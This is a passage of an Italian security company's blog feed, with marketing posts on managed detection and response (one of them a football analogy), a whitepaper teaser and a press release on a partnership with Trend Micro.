      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 100%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAIAAAAC64paAAAACXBIWXMAAC4jAAAuIwF4pT92AAADM0lEQVR42m1UW28TVxDOb2urUvrARYgiRUaqAKHSCpWWS0uEqqIWiUekSq0EggackIDTxJhAgYSUQOxk7WDv3evdPWd3z3V3Te04kPeO7dgiDdJodObsfDPfzJnZkYiInnBCRBiJkHQFzrSn+18JjSntmj3hw/sRcKVUOoiYiFV80dWVmuNHOhZuKBqhwCE3jLqNqIGlhTk42MF23D5YWIFY97kVSAdTVTNNn5Y9YSCu+hwFtFrV9EYI4TQkDCwsPAAPiHXtsHdO0paQb4RI4vhN2txI0nbabMfJv4TKbech7UHN/RASYZIvPHqxvFKtGSvFtVxubnauMJt/+OjxUx9FQ/z/wWHEuUhNq/Hp3s9PfXP62ImT35+7cPrb706c/Grs0k/nLvwI+YOQfRjMqJBcBjh69nRxcXEpny+MXRy7du23+fnHvh8WS4qUKSOc0V20oVoVCcXlVSRt1grTzVXDyxYW/srPr2pOwJtENJ0AnoODG4oGDQsikTDxwORjRfZLObmsxJklmXkufi6nR1Y6C2Trcjk+uyIvrsWXlPRsMT6+RGuomz8cPpWJRcFkCzX3Sc27Xapn19yZanDjlT2vmP/U2d11NFGyfn9hLBsob3IDc9oH91sleUJ8fGDfvk8++nj08KHRw19c/fXKof37Dx44+MP588ePZr7MZM58fWrvZ3tSBmklzOL77yw9RMazd/+8PXFn8t70/dmb49nrt8azk9NT92ZujU9MTuWePV++MzkNA7er21RSFm90tkBa7bddaXU6na32xrtWa7N3+Q7mpNV6y3gcEblztt2gqpo11Vx/rcF4KBUVhhlM3agr5apuOppmWW5oIarrdsML+tMyAgVDTrvuVdZVTbdB4KzqdT1MVN02TAdCgC4WFdsn9VCWViuW7QIEgNu0ccQdzCqvNUgF3vUG0izXshu9PeOlUhkC1TRL1SylUsMBHWTubxViqs8ABp+BQqVHHhgaHrG86OXLEtw7DQQUoDo06Nkgc0CDHv++BpPxRMomrFectuFMd67EDjDZ+d/wPPxHNjf38O+Zmbmpqdxu2AdWciiwPVBhw8WabsFKQGZoz27wf7Rw3DQONRfNAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/4ebe550655a0a641dbff9eb8d9d2ae53/71c1d/certego%20buon%20natale%202024.png&quot; srcset=&quot;/website/static/4ebe550655a0a641dbff9eb8d9d2ae53/804b2/certego%20buon%20natale%202024.png 384w,
/website/static/4ebe550655a0a641dbff9eb8d9d2ae53/e5715/certego%20buon%20natale%202024.png 768w,
/website/static/4ebe550655a0a641dbff9eb8d9d2ae53/71c1d/certego%20buon%20natale%202024.png 1536w,
/website/static/4ebe550655a0a641dbff9eb8d9d2ae53/a878e/certego%20buon%20natale%202024.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Preparazione, strategia e confronto con l’avversario: l’MDR spiegato attraverso il calcio]]></title><description><![CDATA[Vincere le sfide della cybersecurity con successo]]></description><link>https://www.certego.net/blog/mdr-spiegato-attraverso-il-calcio/</link><guid isPermaLink="false">mdr-spiegato-attraverso-il-calcio</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 11 Dec 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;La cybersecurity, proprio come il calcio, è una combinazione di &lt;strong&gt;strategia, preparazione e competizione&lt;/strong&gt;. Ogni azione sul campo, sia esso fisico o digitale, contribuisce a un piano più ampio che mira a raggiungere obiettivi concreti e garantire il successo.&lt;/p&gt;
&lt;p&gt;Nel calcio, avere una difesa solida è il pilastro del gioco: protegge la squadra dagli attacchi avversari e crea le condizioni per costruire azioni di gioco efficaci. Serve inoltre una squadra ben preparata, un team tecnico con una visione di gioco chiara, la capacità di leggere i cambiamenti durante la partita e la prontezza di rispondere e adattarsi in tempo reale alle mosse dell’avversario.&lt;/p&gt;
&lt;p&gt;Allo stesso modo, la cybersecurity richiede una strategia completa che combini rilevamento, analisi e risposta per garantire non solo la resilienza, ma anche la competitività di un’azienda.
Gestire la sicurezza di un’azienda è come essere allenatori e giocatori di una squadra di calcio: bisogna essere pronti sul campo di gioco, in grado di leggere il gioco dell’avversario (i cybercriminali) per anticiparne le mosse e agire con determinazione, proprio come si costruisce e protegge un vantaggio durante una partita decisiva.&lt;/p&gt;
&lt;h2&gt;La preparazione&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Studiare l’avversario&lt;/h3&gt;
&lt;p&gt;Nel calcio, nel periodo di avvicinamento a una partita, la squadra si dedica all’analisi dell’avversario: osserva come ha giocato in precedenza, studia le strategie adottate, identifica i punti di forza da contrastare e le debolezze da sfruttare. Questo lavoro è fondamentale per costruire un piano di gioco solido e scendere in campo con la preparazione necessaria ad affrontare qualsiasi scenario.&lt;/p&gt;
&lt;p&gt;Allo stesso modo, un servizio MDR si basa sull’&lt;strong&gt;analisi approfondita degli avversari&lt;/strong&gt;, i cybercriminali. Attraverso la threat intelligence e la threat research, l’MDR identifica le &lt;strong&gt;tattiche, le tecniche e le procedure&lt;/strong&gt; (TTP) che questi utilizzano, anticipandone i movimenti. Questo approccio consente di creare un sistema di sicurezza proattivo, capace di neutralizzare le minacce più avanzate prima che possano compromettere gli asset aziendali critici.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Creare una strategia di gioco&lt;/h3&gt;
&lt;p&gt;Un allenatore sa che, per vincere, nulla può essere lasciato al caso. Ogni schema, posizione e tattica deve essere pianificato con attenzione, e ogni giocatore deve conoscere il proprio ruolo e sapere esattamente come reagire in campo.&lt;/p&gt;
&lt;p&gt;Nella cybersecurity, la strategia è altrettanto fondamentale. &lt;strong&gt;Un servizio MDR crea un sistema di protezione multilivello, combinando tecnologie avanzate, analisi continua e l’esperienza di esperti qualificati&lt;/strong&gt;. Ogni componente del sistema lavora in modo integrato e coordinato per garantire una protezione completa del &quot;campo&quot; aziendale.&lt;/p&gt;
&lt;p&gt;Questo livello di preparazione non solo protegge da ogni possibile varco, ma riduce significativamente i rischi, rafforzando la resilienza aziendale e aumentando le possibilità di successo contro qualsiasi attacco.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h2&gt;Il confronto sul campo&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;La difesa come base per l’azione&lt;/h3&gt;
&lt;p&gt;Nel calcio, una difesa solida è fondamentale, ma non basta per vincere. Proteggere la propria porta con disciplina e organizzazione è essenziale per fermare gli attacchi avversari e impedire loro di segnare. Allo stesso tempo, una difesa efficace deve essere il punto di partenza per sviluppare azioni offensive e avanzare con decisione verso l’obiettivo finale.&lt;/p&gt;
&lt;p&gt;L’approccio dell’MDR è simile: &lt;strong&gt;non si limita a bloccare le minacce&lt;/strong&gt;, ma agisce come un regista al centro del campo. Sempre vigile, osserva il gioco, valuta la situazione in tempo reale, detta i tempi, identifica i rischi e coordina le azioni della squadra per adattare le strategie e orchestrare le mosse necessarie a contrattaccare gli avversari (i cybercriminali) e prevenire azioni simili in futuro. Ogni endpoint, utente e sistema è costantemente monitorato, trasformando ogni segnale di anomalia in un’opportunità per consolidare il controllo del campo digitale e mantenere l’iniziativa.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Risposta immediata alle emergenze&lt;/h3&gt;
&lt;p&gt;Nel calcio, non è purtroppo possibile prevedere tutto. Durante una partita può capitare che l’avversario riesca a creare un’occasione imprevista. In questi momenti, la squadra deve adattarsi rapidamente, cambiando formazione, modificando gli schemi di gioco o passando da una mentalità difensiva a un approccio più offensivo per recuperare il controllo della partita.&lt;/p&gt;
&lt;p&gt;È come quando una squadra subisce un gol inaspettato. Invece di cedere alla pressione, il capitano e l’allenatore coordinano rapidamente una nuova strategia: spostano i giocatori in ruoli diversi e intensificano il pressing per riguadagnare terreno. Ogni movimento sul campo diventa cruciale per ribaltare il risultato e creare nuove opportunità per segnare.&lt;/p&gt;
&lt;p&gt;Allo stesso modo, nel campo della cybersecurity, l’MDR (Managed Detection and Response) &lt;strong&gt;agisce come una squadra pronta a reagire rapidamente a minacce impreviste&lt;/strong&gt;. Attraverso strategie adattive e risposte immediate, aiuta a contenere l’attacco e a ristabilire la sicurezza dell’ambiente digitale.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/5-segnali-che-indicano-che-hai-bisogno-di-un-servizio-di-managed-detection-response/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACg0lEQVR42mWSSUwTURjHe5fENFGDcYkGiUROSnowJqhxjcGEo/Fq4tF4xYMXF1KKuGCQqJBwMHIwgmFpKaXThSqlA0O3mZbZ25kuFAUuKhze3zdT9OLhlzfzzft+873vew5R1jA2EwQTmcfElBcsl0TBrEDVDagF00az0E0UjPK/b9rf+C56sWTFdxySoiMcjSGTFRBmGAh0rZYrMA3TplisJ1gSs1LD1u9tVNY3bIHFf0KZ/nkyY2JJMhHKlxEWivClVAQzOmbTOj4mVCi6VaGBQrmK2s9f+E6pbGxhVdVRsKS7Fe8KDXxIaJhO6RiIyeiNyHCHZYyyGga/KhheqAutxJSkIkRbFM2LiCsq4pKCwo9NSPQU1bV1qyU7DsucygjI8nlkMjziKzxiHI9cTkQyzdutyK3KqNLjznIp3P/8BX1MFO8WWYxwaQzGouh88hBdA2+Qza/uOBStiG9xFguLy4gnlsEur4BlOXDJDI0tIbGURJy+C4IIhg6sresBLnS7ccXtsdfT9+6i8eolOM81o2+ovy70+YM2k9N+eP1zCIbnMRNg4A+E7OcArSiVFujEDbTfuY3Gjg4cutGJpls3ceT6ebRca8P+M050v+ytCxmaZBEIhmlyBOlsDjLtlSSrsG6BhbWvVtvE+9Fh7HMdxYGzLhy77MJBVytOtB/H3pYG9Lx+RodCN0565zA24cOn8SmEogvQjAqyWgkCRZR15EUVOVGxxaXyOjwDHpy82ArnqcNoaHLC2eyEY48Dj3qf2veQTPnmiNfPkPEJP4nMx4lmlElSKpAUhc9LhM+JJCuIhMoJvRpkrbZJWI4jb0eGiKf/OfG8ekEe97jhZ0LbfwA2doHQUBazIAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/ea3a6ebc197c18ffb5accd7cb7fc5fa6/71c1d/certego%20managed%20detection%20response%20segnali.png&quot; srcset=&quot;/website/static/ea3a6ebc197c18ffb5accd7cb7fc5fa6/804b2/certego%20managed%20detection%20response%20segnali.png 384w,
/website/static/ea3a6ebc197c18ffb5accd7cb7fc5fa6/e5715/certego%20managed%20detection%20response%20segnali.png 768w,
/website/static/ea3a6ebc197c18ffb5accd7cb7fc5fa6/71c1d/certego%20managed%20detection%20response%20segnali.png 1536w,
/website/static/ea3a6ebc197c18ffb5accd7cb7fc5fa6/a878e/certego%20managed%20detection%20response%20segnali.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;L’analisi post-partita&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Imparare dall’esperienza&lt;/h3&gt;
&lt;p&gt;Ogni partita rappresenta una preziosa opportunità di apprendimento per la squadra. Analizzare i momenti chiave consente di affinare la strategia e migliorare le prestazioni future. Ad esempio, osservare una nuova tattica adottata dall’avversario fornisce spunti fondamentali per affrontare al meglio le prossime sfide.&lt;/p&gt;
&lt;p&gt;Lo stesso vale per i team di Security Operations dei provider MDR. Grazie all’esperienza maturata sul campo, non si limitano a bloccare le minacce, ma &lt;strong&gt;raccolgono dati e informazioni cruciali per adattare e perfezionare continuamente le proprie strategia&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Un servizio MDR svolge analisi approfondite per:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Comprendere l’origine della minaccia&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Analizzare le azioni intraprese dai cybercriminali&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Identificare i punti di forza e debolezza dei sistemi&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Evoluzione continua per restare al top&lt;/h3&gt;
&lt;p&gt;Come una squadra di calcio che, dopo ogni partita, si prepara alla prossima con allenamenti mirati e strategie adattate, anche il tuo sistema di sicurezza deve evolversi costantemente. L’&lt;strong&gt;MDR utilizza l’esperienza accumulata per migliorare la reattività e l’efficienza del sistema, implementando best practice e playbook di risposta predefiniti per affrontare il panorama in continua evoluzione delle minacce informatiche&lt;/strong&gt;. Inoltre, fornisce consigli utili per aggiornare e ottimizzare continuamente i sistemi di difesa, garantendo una protezione sempre al passo con le nuove sfide.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Un fornitore MDR d’élite lavora instancabilmente, proprio come le squadre più vincenti&lt;/strong&gt;, per garantire la protezione e la resilienza della tua azienda. Vincere, infatti, non significa solo sapersi difendere: una difesa solida è il cuore della strategia, ma deve essere supportata dalla capacità di anticipare le mosse dell’avversario e rispondere con intelligenza. Sul campo, come nel mondo digitale, preparazione e visione sono essenziali per restare sempre un passo avanti rispetto all’avversario e vincere le partite più importanti!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Novembre 2024]]></description><link>https://www.certego.net/blog/whitepaper-novembre-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-novembre-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 08 Dec 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di novembre 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[5 segnali che indicano che hai bisogno di un servizio di Managed Detection & Response]]></title><description><![CDATA[Il supporto essenziale per affrontare le crescenti sfide della cybersecurity]]></description><link>https://www.certego.net/blog/5-segnali-che-indicano-che-hai-bisogno-di-un-servizio-di-managed-detection-response/</link><guid isPermaLink="false">5-segnali-che-indicano-che-hai-bisogno-di-un-servizio-di-managed-detection-response</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 26 Nov 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Le sfide della sicurezza informatica sono sempre più complesse, mettendo molte organizzazioni in difficoltà nel mantenere le difese efficaci.&lt;/p&gt;
&lt;p&gt;In questo articolo, analizziamo cinque segnali che possono indicare la necessità per la tua azienda di adottare un servizio di Managed Detection and Response (MDR).&lt;/p&gt;
&lt;p&gt;Vedremo come un servizio MDR, integrando tecnologia avanzata, threat intelligence e l’esperienza di esperti di Security Operations, possa offrire un supporto essenziale per affrontare le crescenti sfide della sicurezza informatica.&lt;/p&gt;
&lt;h2&gt;1- Le minacce richiedono troppo tempo per essere identificate e risolte&lt;/h2&gt;
&lt;p&gt;Le minacce informatiche, se non rilevate tempestivamente, possono insidiarsi silenziosamente nei sistemi aziendali per giorni, settimane o addirittura mesi. Questo tempo &quot;invisibile&quot; consente agli attaccanti di ampliare la loro portata degli attacchi.&lt;/p&gt;
&lt;p&gt;Senza adeguati sistemi di detection, queste minacce spesso passano inosservate, rendendo la risposta agli incidenti più lunga e complessa.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;In che modo un servizio MDR può fare la differenza?&lt;/h3&gt;
&lt;p&gt;Un servizio MDR offre un monitoraggio continuo 24/7, rilevando e segnalando tempestivamente le attività sospette prima che possano causare danni.&lt;/p&gt;
&lt;p&gt;Grazie all’uso della tecnologia avanzata, supportata da un team di analisti dedicati che intervengono in tempo reale, è possibile accelerare i tempi di risposta e mitigazione, garantendo una protezione efficace e prevenendo rischi prolungati per la tua azienda.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h2&gt;2- Le minacce si evolvono più rapidamente delle tue capacità di difesa&lt;/h2&gt;
&lt;p&gt;I criminali informatici sviluppano costantemente nuove tecniche per superare le difese tradizionali. Se non riesci a stare al passo, la tua organizzazione rischia di trovarsi sempre in svantaggio.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;In che modo un servizio MDR può fare la differenza?&lt;/h3&gt;
&lt;p&gt;Un servizio MDR rafforza il tuo team interno con esperti di threat hunting, capaci di identificare proattivamente le minacce più sofisticate.&lt;/p&gt;
&lt;p&gt;Attraverso informazioni avanzate di threat intelligence e l’analisi del comportamento degli attaccanti, consente di prevedere e contrastare proattivamente le azioni dei criminali informatici e aggiornare i sistemi di difesa prima che le minacce si concretizzino, garantendoti un vantaggio strategico e una maggiore resilienza.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-come-scegliere-il-servizio-migliore-per-la-tua-azienda/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACiElEQVR42j2SS08TURTH+0H4Bq7xE7hxoR/AxLgwJkRCSJAYNZGFGhpUgkoEglF5+ag8Ggp0ilPa0k5hSksf05lOO51O5z2lSlwaWdy/t1Pj4peTe07u/zwDzZaOcCyBRJrDzi6DQrEC0+lAM2y0DcdHM22YdgclUURRrMD1fkI3ezHbtz0My+29LwKqZiDDZVGryUgmkmjIdbhuB7Zlw7MduLYLm9ozr4tcOY/58CKYLAvdcGFZXSpm+/wXbFN1VnaRbTg4VjuIVk2kJANx0cBuRUdM0MFQ4qKJE5pUMkXs8BuI8EsoKzxspwvT8qBbTl+wqdtYzmlYyGp4y6l4nVaxetLGCvX1hLKyiQwlXTMh6zp+/e6gap4ilAtiX1iE6imoKiJc55yOxbsItOgcjuiHHgmp/7HHIUWj1XturzUbZ24X+SqP2c1niJxsYp4J4mtmDl+4D3izPYFvqTmI9cZFQNMtFE9LKJcrECoCCoUieD7n+2qyArVtoWVYcLwfSB1xGJ+7hXsv7iK49hiToftYZRcxNj2MKyOX8Or9dH8pBykO8WQGbOIQMTaJdDaHre09MN8PcJwr/Nuih0ZTw6PZUVy/cw1DE7cxE5rCw5kHGLx6GQODA3g++7JfYVWqQ1E11JUWxFoDxbKIUllAsST4InQ2/ol4nXNsMBuY/BgEm0+g1dWxFF3D8NMxmmAEochWX5BhU9ijtxiO7IM7ysOgNydpDuS2g4ba9hPVFY22b8KiMbFVR7x0gL3TKNbYTxh6Moob4zexsv7Zb5nsMnFCBUk4EiOHGZ60LY9UVJMIlFpDJbV6k0hykzRbBqHtE1otKUoC4cU8iXFx8i60TKYWphFl2T9/AXUdmQAv4wlOAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/0f2146289e5e99af1cd8e4272fc4349a/71c1d/certego%20managed%20detection%20response%20come%20scegliere.png&quot; srcset=&quot;/website/static/0f2146289e5e99af1cd8e4272fc4349a/804b2/certego%20managed%20detection%20response%20come%20scegliere.png 384w,
/website/static/0f2146289e5e99af1cd8e4272fc4349a/e5715/certego%20managed%20detection%20response%20come%20scegliere.png 768w,
/website/static/0f2146289e5e99af1cd8e4272fc4349a/71c1d/certego%20managed%20detection%20response%20come%20scegliere.png 1536w,
/website/static/0f2146289e5e99af1cd8e4272fc4349a/a878e/certego%20managed%20detection%20response%20come%20scegliere.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;3- Troppe aree dell’infrastruttura IT sono invisibili&lt;/h2&gt;
&lt;p&gt;La mancanza di visibilità su alcuni segmenti della rete, dispositivi critici o ambienti cloud rappresenta una grave debolezza nella tua strategia di sicurezza.&lt;/p&gt;
&lt;p&gt;Queste zone cieche diventano facilmente bersagli per i criminali informatici, che le sfruttano per infiltrarsi, muoversi lateralmente e nascondersi, rendendo estremamente difficile il rilevamento e la risposta tempestiva alle minacce.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;In che modo un servizio MDR può fare la differenza?&lt;/h3&gt;
&lt;p&gt;I migliori servizi MDR offrono una visibilità completa e una risposta immediata su tutte le superfici di attacco.&lt;/p&gt;
&lt;p&gt;Attraverso una piattaforma centralizzata di monitoraggio e l’analisi avanzata dei dati telemetrici, riescono a eliminare i punti ciechi e a fornire una comprensione dettagliata di ogni livello dell’infrastruttura.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h2&gt;4- Il tuo team è sommerso dagli avvisi di sicurezza&lt;/h2&gt;
&lt;p&gt;Un volume eccessivo di avvisi, spesso arricchito da numerosi falsi positivi, può distrarre il tuo team e portare alla trascuratezza di segnali critici. I sistemi di sicurezza generano costantemente notifiche, ma senza una gestione efficiente, è facile che le minacce reali passino inosservate.&lt;/p&gt;
&lt;p&gt;Questo non solo aumenta i rischi per la tua organizzazione, ma contribuisce anche alla cosiddetta &quot;fatica da alert&quot;, che riduce la produttività e il morale del team.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;In che modo un servizio MDR può fare la differenza?&lt;/h3&gt;
&lt;p&gt;Un servizio MDR d’élite può semplificare significativamente la gestione degli incidenti, consentendo al tuo team di concentrarsi sulle attività più strategiche e ad alto valore aggiunto.&lt;/p&gt;
&lt;p&gt;Il provider MDR pre-filtra gli eventi anomali, eliminando i falsi positivi e segnalando solo le minacce che rappresentano un rischio concreto, migliorando l’efficacia e la tempestività nella gestione degli incidenti.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h2&gt;5 - Il carico di lavoro sta crescendo senza sosta&lt;/h2&gt;
&lt;p&gt;L’aumento costante del numero di dispositivi, utenti e applicazioni rende la gestione della sicurezza sempre più complessa e impegnativa.&lt;/p&gt;
&lt;p&gt;I team interni, spesso già sovraccarichi, rischiano di commettere errori o di non riuscire a rispondere tempestivamente agli incidenti, con conseguenze che riducono l’efficacia complessiva delle difese e aumentano la vulnerabilità dell’organizzazione.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;In che modo un servizio MDR può fare la differenza?&lt;/h3&gt;
&lt;p&gt;Collaborare con un fornitore MDR ti permette di accedere immediatamente a un team di esperti dedicati, che monitorano costantemente il tuo ambiente IT e intervengono in tempo reale per contrastare le minacce.&lt;/p&gt;
&lt;p&gt;Grazie alla presenza di specialisti attivi 24/7, il servizio MDR diventa un’estensione del tuo team, liberandoti dal carico di lavoro operativo. In questo modo, puoi concentrare le risorse interne sulle attività strategiche e continuare a gestire il tuo business con maggiore serenità e sicurezza.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;p&gt;Affrontare le sfide della cybersecurity non è mai stato così complesso. Se stai riscontrando uno o più di questi segnali — tempi di risposta troppo lunghi, minacce sempre più avanzate, sovraccarico di avvisi, mancanza di visibilità e un carico di lavoro in continuo aumento — è il momento di considerare un servizio MDR.&lt;/p&gt;
&lt;p&gt;Un servizio avanzato di Managed Detection &amp;#x26; Response può diventare il tuo alleato strategico, offrendo monitoraggio continuo, competenze avanzate e una gestione efficace delle minacce per garantire una protezione completa e proattiva.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Un’alleanza innovativa per la sicurezza IT: nasce una nuova offerta tecnologica di Certego e Trend Micro]]></title><description><![CDATA[La partnership tra Certego e Trend Micro dà vita a una soluzione avanzata che combina i servizi gestiti di Certego con la piattaforma Trend Vision One del vendor, proponendo sul mercato un servizio MDR senza precedenti]]></description><link>https://www.certego.net/blog/un-alleanza-innovativa-per-la-sicurezza-it-nasce-una-nuova-offerta-tecnologica-di-certego-e-trend-micro/</link><guid isPermaLink="false">un-alleanza-innovativa-per-la-sicurezza-it-nasce-una-nuova-offerta-tecnologica-di-certego-e-trend-micro</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Sun, 24 Nov 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Modena, 25 Novembre 2024&lt;/strong&gt; - &lt;strong&gt;Certego&lt;/strong&gt;, società del gruppo VEM sistemi specializzata in servizi di sicurezza IT gestiti e di contrasto al Cybercrime, insieme a &lt;strong&gt;Trend Micro&lt;/strong&gt;, leader globale nella cybersecurity, ha sviluppato una soluzione tecnologica proprietaria nella sua piattaforma cloud di Unified Security Operations &lt;strong&gt;PanOptikon©&lt;/strong&gt;, in grado di integrarsi con Trend Vision OneTM e garantire una protezione proattiva di detection e response unica nel mercato italiano.&lt;/p&gt;
&lt;p&gt;La soluzione, realizzata dal team di sviluppo di Certego con il contributo di Trend Micro, è frutto di una stretta collaborazione tra le due aziende che hanno lavorato sinergicamente nell&apos;ultimo anno per realizzarla, portando alla nascita di una partnership tecnologica e commerciale di altissimo livello. La collaborazione va oltre la proposizione di un tradizionale servizio SOC (Security Operations Center): si configura come un servizio avanzato, risultato dell&apos;integrazione nativa tra le tecnologie dei due vendor, in grado di offrire ai clienti molto più di un semplice monitoraggio degli allarmi. Grazie alla possibilità di accedere ai dati telemetrici di Trend Micro, la soluzione garantisce infatti i vantaggi di una piattaforma XDR completa aggiungendo ulteriori logiche di analisi e i dati di Threat Intelligence di Certego, specificamente mirati alle esigenze delle imprese e al contesto cyber italiano. Questo approccio innovativo rende la nuova tecnologia una risorsa preziosa per le aziende che necessitano non solo di protezione, ma anche di un&apos;analisi approfondita delle minacce fin dai primi sintomi di una potenziale compromissione. Attraverso questa sinergia, Certego e Trend Micro rispondono alle moderne sfide della sicurezza, offrendo una soluzione ineguagliabile e concepita per fornire un servizio di detection e response che supera le offerte tradizionali, apportando un valore aggiunto concreto all’intero del mercato della cybersecurity.&lt;/p&gt;
